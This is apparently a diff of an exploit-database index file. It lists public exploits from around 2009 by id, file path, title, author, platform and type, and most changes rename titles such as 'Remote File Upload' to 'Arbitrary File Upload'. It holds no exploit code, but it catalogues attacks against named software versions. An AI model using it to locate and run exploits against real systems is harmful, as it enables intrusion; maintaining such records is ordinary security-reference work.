10086,platforms/multiple/remote/10086.txt,"WebKit - 'Document()' Function Remote Information Disclosure",2009-11-12,"Chris Evans",multiple,remote,0 10088,platforms/php/webapps/10088.txt,"WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0 -10089,platforms/php/webapps/10089.txt,"WordPress 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 +10089,platforms/php/webapps/10089.txt,"WordPress 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 @@ -9476,7 +9477,7 @@ id,file,description,date,author,platform,type,port 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 40083,platforms/php/webapps/40083.txt,"WordPress Activity Log Plugin 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21 -10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / File Upload",2009-11-17,blackenedsecurity,asp,webapps,0 +10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps,0 10162,platforms/windows/remote/10162.py,"Home FTP Server - 'MKD' Command Directory Traversal",2009-11-17,zhangmc,windows,remote,21 10163,platforms/windows/dos/10163.pl,"Novell eDirectory - HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,windows,dos,80 10164,platforms/windows/dos/10164.c,"Kaspersky AV 2010 9.0.0.463 - Local Denial of Service",2009-09-29,Heurs,windows,dos,0 @@ -9493,7 +9494,7 @@ id,file,description,date,author,platform,type,port 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 10181,platforms/php/webapps/10181.txt,"bitrix site manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0 10182,platforms/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos,0 -10183,platforms/php/webapps/10183.php,"Joomla 1.5.12 RCE via TinyMCE - File Upload",2009-11-19,daath,php,webapps,80 +10183,platforms/php/webapps/10183.php,"Joomla 1.5.12 RCE via TinyMCE - Arbitrary File Upload",2009-11-19,daath,php,webapps,80 10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0 10185,platforms/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 10186,platforms/bsd/dos/10186.txt,"K-Meleon 1.5.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 @@ -9563,7 +9564,7 @@ id,file,description,date,author,platform,type,port 10259,platforms/php/webapps/10259.txt,"Ciamos CMS 0.9.5 - (module_path) Remote File Inclusion",2009-12-01,"cr4wl3r ",php,webapps,0 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MySQL Scripts - Authentication Bypass",2009-12-01,DUNDEE,php,webapps,0 10261,platforms/linux/webapps/10261.txt,"dotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80 -10262,platforms/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure Exploit",2009-12-01,"cr4wl3r ",linux,webapps,80 +10262,platforms/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure",2009-12-01,"cr4wl3r ",linux,webapps,80 10263,platforms/linux/webapps/10263.txt,"quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities",2009-12-01,"cr4wl3r ",linux,webapps,80 10264,platforms/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10265,platforms/multiple/local/10265.txt,"Oracle - SYS.LT.COMPRESSWORKSPACETREE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 @@ -9579,7 +9580,7 @@ id,file,description,date,author,platform,type,port 10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion",2009-12-03,"cr4wl3r ",php,webapps,0 10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow",2009-11-21,mr_me,windows,local,0 10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow",2009-12-03,pyrokinesis,windows,local,0 -10282,platforms/linux/remote/10282.py,"OrzHTTPd - Format String Exploit",2009-12-03,"Patroklos Argyroudis",linux,remote,80 +10282,platforms/linux/remote/10282.py,"OrzHTTPd - Format String",2009-12-03,"Patroklos Argyroudis",linux,remote,80 10284,platforms/php/webapps/10284.txt,"ita-forum 5.1.32 - SQL Injection",2009-11-30,BAYBORA,php,webapps,0 10285,platforms/php/webapps/10285.txt,"Public Media Manager - Exploit",2009-12-01,"cr4wl3r ",php,webapps,0 10286,platforms/php/webapps/10286.txt,"OpenCSP - Multiple Remote File Inclusion",2009-11-25,EANgel,php,webapps,0 @@ -9620,7 +9621,7 @@ id,file,description,date,author,platform,type,port 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,windows,webapps,0 10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 - smb:// URI Handling Remote Stack Overflow (PoC)",2009-12-06,Dr_IDE,windows,dos,0 -10334,platforms/multiple/dos/10334.py,"VLC Media Player 1.0.3 (OS X/Linux) - RTSP Buffer Overflow (PoC)",2009-12-06,Dr_IDE,multiple,dos,0 +10334,platforms/multiple/dos/10334.py,"VLC Media Player 1.0.3 (OSX/Linux) - RTSP Buffer Overflow (PoC)",2009-12-06,Dr_IDE,multiple,dos,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 10337,platforms/php/webapps/10337.txt,"Chipmunk NewsLetter - Persistent Cross-Site Scripting",2009-12-07,mr_me,php,webapps,0 10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption (PoC)",2009-12-07,"Jeremy Brown",linux,dos,0 @@ -9641,7 +9642,7 @@ id,file,description,date,author,platform,type,port 10356,platforms/php/webapps/10356.txt,"Joomla Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 -10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow Exploit",2009-12-09,mr_me,windows,local,0 +10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow",2009-12-09,mr_me,windows,local,0 10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Authentication Bypass) SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - (user.ini) Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 @@ -9651,7 +9652,7 @@ id,file,description,date,author,platform,type,port 10367,platforms/php/webapps/10367.txt,"Joomla Component com_jphoto - 'id' SQL Injection",2009-12-10,kaMtiEz,php,webapps,0 10368,platforms/asp/webapps/10368.txt,"Free ASP Upload - Arbitrary File Upload",2009-12-10,Mr.aFiR,asp,webapps,0 10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",php,webapps,0 -10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote Authentication Bypass SQL Injection",2009-12-10,mr_me,php,webapps,0 +10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection)",2009-12-10,mr_me,php,webapps,0 10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local,0 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0 10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0 @@ -9692,13 +9693,13 @@ id,file,description,date,author,platform,type,port 10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10422,platforms/php/webapps/10422.txt,"eoCMS 0.9.03 - Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1 - '.m3u' Stack Overflow",2009-12-14,"Vinod Sharma",windows,local,0 -10424,platforms/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin User) Exploit",2009-12-14,p0deje,multiple,webapps,0 +10424,platforms/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,multiple,webapps,0 10425,platforms/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Authentication Bypass",2009-12-14,Mr.aFiR,asp,webapps,0 -10426,platforms/linux/webapps/10426.txt,"[WS] upload - Remote File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 +10426,platforms/linux/webapps/10426.txt,"[WS] upload - Arbitrary File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 10427,platforms/linux/webapps/10427.txt,"DigitalHive - Multiple Vulnerabilities",2009-12-14,"ViRuSMaN ",linux,webapps,80 -10428,platforms/windows/webapps/10428.txt,"Maxs AJAX File Uploader - Remote File Upload",2009-12-14,"ViRuSMaN ",windows,webapps,80 -10429,platforms/linux/webapps/10429.txt,"myPHPupload 0.5.1 - Remote File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 -10430,platforms/linux/webapps/10430.txt,"NAS Uploader 1.0 / 1.5 - Remote File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 +10428,platforms/windows/webapps/10428.txt,"Maxs AJAX File Uploader - Arbitrary File Upload",2009-12-14,"ViRuSMaN ",windows,webapps,80 +10429,platforms/linux/webapps/10429.txt,"myPHPupload 0.5.1 - Arbitrary File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 +10430,platforms/linux/webapps/10430.txt,"NAS Uploader 1.0 / 1.5 - Arbitrary File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 10431,platforms/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote Bypass",2009-12-14,Nicob,multiple,webapps,80 10432,platforms/multiple/webapps/10432.txt,"zabbix server - Multiple Vulnerabilities",2009-12-14,Nicob,multiple,webapps,80 10433,platforms/linux/webapps/10433.txt,"Mail Manager Pro - Cross-Site Request Forgery (Change Admin Password)",2009-12-14,"Milos Zivanovic ",linux,webapps,80 @@ -9767,9 +9768,9 @@ id,file,description,date,author,platform,type,port 10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload - Arbitrary File Upload",2009-12-17,"wlhaan hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' Cross-Site Scripting",2009-12-17,"Juan Galiana Lara",php,webapps,0 -10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 +10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 10514,platforms/windows/webapps/10514.txt,"dblog - 'dblog.mdb' Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps,0 -10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 - Add Admin Exploit",2009-12-17,RENO,php,webapps,0 +10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 - Add Admin",2009-12-17,RENO,php,webapps,0 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script - Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 @@ -9811,22 +9812,22 @@ id,file,description,date,author,platform,type,port 10564,platforms/php/webapps/10564.txt,"SaurusCMS 4.6.4 - Multiple Remote File Inclusions",2009-12-19,"cr4wl3r ",php,webapps,0 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0 -10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Remote File Upload",2009-12-20,"Master Mind",php,webapps,0 +10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Arbitrary File Upload",2009-12-20,"Master Mind",php,webapps,0 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion",2009-12-20,cOndemned,php,webapps,0 10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps,0 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller - Cross-Site Scripting",2009-12-20,K053,php,webapps,0 10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - SQL Injection",2009-12-20,"Master Mind",php,webapps,0 10573,platforms/asp/webapps/10573.txt,"8Pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,asp,webapps,0 -10574,platforms/php/webapps/10574.txt,"phUploader 2 - Remote File Upload",2009-12-20,wlhaan-hacker,php,webapps,0 +10574,platforms/php/webapps/10574.txt,"phUploader 2 - Arbitrary File Upload",2009-12-20,wlhaan-hacker,php,webapps,0 10575,platforms/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection",2009-12-21,Sora,php,webapps,0 10576,platforms/asp/webapps/10576.txt,"Angelo-emlak 1.0 - Database Disclosure",2009-12-21,LionTurk,asp,webapps,0 10577,platforms/windows/local/10577.pl,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (SEH)",2009-12-21,"ThE g0bL!N",windows,local,0 -10578,platforms/php/webapps/10578.txt,"Ultimate Uploader 1.3 - Remote File Upload",2009-12-21,"Master Mind",php,webapps,0 +10578,platforms/php/webapps/10578.txt,"Ultimate Uploader 1.3 - Arbitrary File Upload",2009-12-21,"Master Mind",php,webapps,0 10579,platforms/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",multiple,remote,0 10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - Denial of Service (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart - SQL Injection",2009-12-21,Gamoscu,asp,webapps,0 10583,platforms/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 -10584,platforms/php/webapps/10584.txt,"PHPhotoalbum - Remote File Upload",2009-12-21,"wlhaan hacker",php,webapps,0 +10584,platforms/php/webapps/10584.txt,"PHPhotoalbum - Arbitrary File Upload",2009-12-21,"wlhaan hacker",php,webapps,0 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS - SQL Injection",2009-12-21,_ÝNFAZCI_,php,webapps,0 10586,platforms/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection",2009-12-21,kaMtiEz,php,webapps,0 10587,platforms/php/webapps/10587.txt,"Joomla Component com_jcalpro 1.5.3.6 - Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps,0 @@ -9835,14 +9836,14 @@ id,file,description,date,author,platform,type,port 10591,platforms/php/webapps/10591.txt,"Joomla Component com_mediaslide - Directory Traversal",2009-12-21,Mr.tro0oqy,php,webapps,0 10592,platforms/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 - Cross-Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps,0 10593,platforms/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0 -10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Remote File Upload",2009-12-22,"Master Mind",php,webapps,0 +10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Arbitrary File Upload",2009-12-22,"Master Mind",php,webapps,0 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow",2009-12-22,data$hack,windows,local,0 -10596,platforms/windows/local/10596.pl,"PlayMeNow - Malformed '.m3u' Universal XP Seh Buffer Overflow",2009-12-22,"ThE g0bL!N",windows,local,0 +10596,platforms/windows/local/10596.pl,"PlayMeNow - Malformed '.m3u' Universal XP Buffer Overflow (SEH)",2009-12-22,"ThE g0bL!N",windows,local,0 10597,platforms/php/webapps/10597.txt,"Active PHP BookMarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,php,webapps,0 10598,platforms/php/webapps/10598.txt,"deluxebb 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 - File Disclosure",2009-12-22,Stack,php,webapps,0 10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion",2009-12-22,BAYBORA,php,webapps,0 -10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Remote File Upload",2009-12-22,MR.Z,php,webapps,0 +10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Arbitrary File Upload",2009-12-22,MR.Z,php,webapps,0 10602,platforms/windows/local/10602.pl,"Easy RM to MP3 27.3.700 (Windows XP SP3) - Exploit",2009-12-22,d3b4g,windows,local,0 10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos,0 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion",2009-12-22,jgaliana,php,webapps,0 @@ -9850,20 +9851,20 @@ id,file,description,date,author,platform,type,port 10609,platforms/php/webapps/10609.txt,"Aurora CMS - SQL Injection",2009-12-22,Sora,php,webapps,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery - Cross-Site Scripting",2009-12-23,indoushka,php,webapps,0 -10612,platforms/php/webapps/10612.txt,"Add An Ad Script - Remote File Upload",2009-12-23,MR.Z,php,webapps,0 +10612,platforms/php/webapps/10612.txt,"Add An Ad Script - Arbitrary File Upload",2009-12-23,MR.Z,php,webapps,0 10613,platforms/linux/local/10613.c,"Linux Kernel 2.6.18 <= 2.6.18-20 - Privilege Escalation",2009-12-23,DigitALL,linux,local,0 10614,platforms/php/webapps/10614.txt,"35mm Slide Gallery - Directory Traversal",2009-12-23,Mr.tro0oqy,php,webapps,0 10615,platforms/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 - (id_catg) SQL Injection",2009-12-23,"Hussin X",php,webapps,0 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0 10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat - Exploit",2009-12-23,"Ahmed Obied",windows,local,0 10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow",2009-12-23,bibi-info,windows,local,0 -10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - Buffer Overflow Exploit",2009-12-23,dijital1,windows,local,0 +10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - Buffer Overflow",2009-12-23,dijital1,windows,local,0 10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman - Cross-Site Scripting",2009-12-24,FL0RiX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection - SQL Injection",2009-12-24,FL0RiX,php,webapps,0 10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 - Admin Login Exploit",2009-12-24,Sora,php,webapps,0 10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 (Windows XP SP3) - '.pls' Stack Buffer Overflow",2009-12-24,d3b4g,windows,local,0 -10629,platforms/php/webapps/10629.txt,"Traidnt Gallery - add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0 +10629,platforms/php/webapps/10629.txt,"Traidnt Gallery - Add Admin",2009-12-24,wlhaan-hacker,php,webapps,0 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 10632,platforms/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection",2009-12-24,molli,php,webapps,0 10633,platforms/php/webapps/10633.txt,"Pragyan CMS 2.6.4 - 'search.php' Remote File Inclusion",2009-12-24,Mr.SeCreT,php,webapps,0 @@ -9895,14 +9896,14 @@ id,file,description,date,author,platform,type,port 10668,platforms/php/webapps/10668.txt,"phpPowerCards 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10670,platforms/php/webapps/10670.txt,"vCard PRO 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10671,platforms/php/webapps/10671.txt,"Info Fisier 1.0 - Remote File Upload",2009-12-26,"wlhaan hacker",php,webapps,0 +10671,platforms/php/webapps/10671.txt,"Info Fisier 1.0 - Arbitrary File Upload",2009-12-26,"wlhaan hacker",php,webapps,0 10672,platforms/php/webapps/10672.txt,"kandalf upper 0.1 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10673,platforms/php/webapps/10673.txt,"DieselScripts jokes - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10674,platforms/php/webapps/10674.txt,"DieselScripts jokes - Backup",2009-12-26,indoushka,php,webapps,0 10675,platforms/php/webapps/10675.txt,"Webring - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 14158,platforms/windows/local/14158.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.m3u' Buffer Overflow",2010-07-01,Madjix,windows,local,0 -10677,platforms/php/webapps/10677.txt,"PHPShop 0.6 - Bypass",2009-12-26,indoushka,php,webapps,0 +10677,platforms/php/webapps/10677.txt,"PHPShop 0.6 - Bypass Exploit",2009-12-26,indoushka,php,webapps,0 10679,platforms/php/webapps/10679.txt,"Quiz - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10680,platforms/php/webapps/10680.txt,"E-Pay - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10681,platforms/php/webapps/10681.txt,"Saibal Download Area 2.0 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 @@ -9946,12 +9947,12 @@ id,file,description,date,author,platform,type,port 10722,platforms/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10725,platforms/php/webapps/10725.txt,"Nuke - SQL Injection",2009-12-27,FormatXformat,php,webapps,0 10726,platforms/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection",2009-12-27,"AnGrY BoY",php,webapps,0 -10727,platforms/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Remote File Upload",2009-12-27,Phenom,php,webapps,0 +10727,platforms/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,php,webapps,0 10728,platforms/php/webapps/10728.txt,"info fisier 1.0 - Multiple Vulnerabilities",2009-12-27,kaozc9,php,webapps,0 10729,platforms/php/webapps/10729.txt,"Joomla Component com_adagency - Exploit",2009-12-27,FL0RiX,php,webapps,0 10730,platforms/php/webapps/10730.txt,"Joomla Component com_intuit - Local File Inclusion",2009-12-27,FL0RiX,php,webapps,0 10731,platforms/php/webapps/10731.txt,"joomla Component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 -10732,platforms/php/webapps/10732.txt,"PHP upload - (unijimpe) Remote File Upload",2009-12-27,"wlhaan hacker",php,webapps,0 +10732,platforms/php/webapps/10732.txt,"PHP upload - (unijimpe) Arbitrary File Upload",2009-12-27,"wlhaan hacker",php,webapps,0 10733,platforms/php/webapps/10733.txt,"com_webcamxp - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0 10734,platforms/php/webapps/10734.txt,"Joomla Component com_beeheard - Blind SQL Injection",2009-12-27,FL0RiX,php,webapps,0 10735,platforms/php/webapps/10735.txt,"com_jm-recommend - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0 @@ -9963,24 +9964,24 @@ id,file,description,date,author,platform,type,port 10741,platforms/php/webapps/10741.txt,"Cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0 10742,platforms/php/webapps/10742.txt,"Joomla Component com_dhforum - SQL Injection",2009-12-27,"ViRuSMaN ",php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0 -10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - (SEH) Buffer Overflow (Metasploit)",2009-12-27,dijital1,windows,local,0 +10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow",2009-12-27,mr_me,windows,local,0 10747,platforms/windows/local/10747.py,"Mini-stream - Windows XP SP2 and SP3 Exploit",2009-12-27,dijital1,windows,local,0 10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 -10752,platforms/multiple/webapps/10752.txt,"Yonja - Remote File Upload",2009-12-28,indoushka,multiple,webapps,80 +10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 10754,platforms/multiple/webapps/10754.txt,"Joomla Component com_if_nexus - Remote File Inclusion",2009-12-28,FL0RiX,multiple,webapps,80 10755,platforms/linux/webapps/10755.txt,"egegen turkish script - SQL Injection",2009-12-28,FormatXformat,linux,webapps,80 10756,platforms/linux/webapps/10756.txt,"MySimpleFileUploader 1.6 - Arbitrary File Upload",2009-12-28,FormatXformat,linux,webapps,80 -10757,platforms/linux/webapps/10757.txt,"PHP Forum ohne My SQL - Remote File Upload",2009-12-28,"wlhaan hacker",linux,webapps,80 +10757,platforms/linux/webapps/10757.txt,"PHP Forum ohne My SQL - Arbitrary File Upload",2009-12-28,"wlhaan hacker",linux,webapps,80 10758,platforms/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection",2009-12-28,BAYBORA,php,webapps,0 10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack 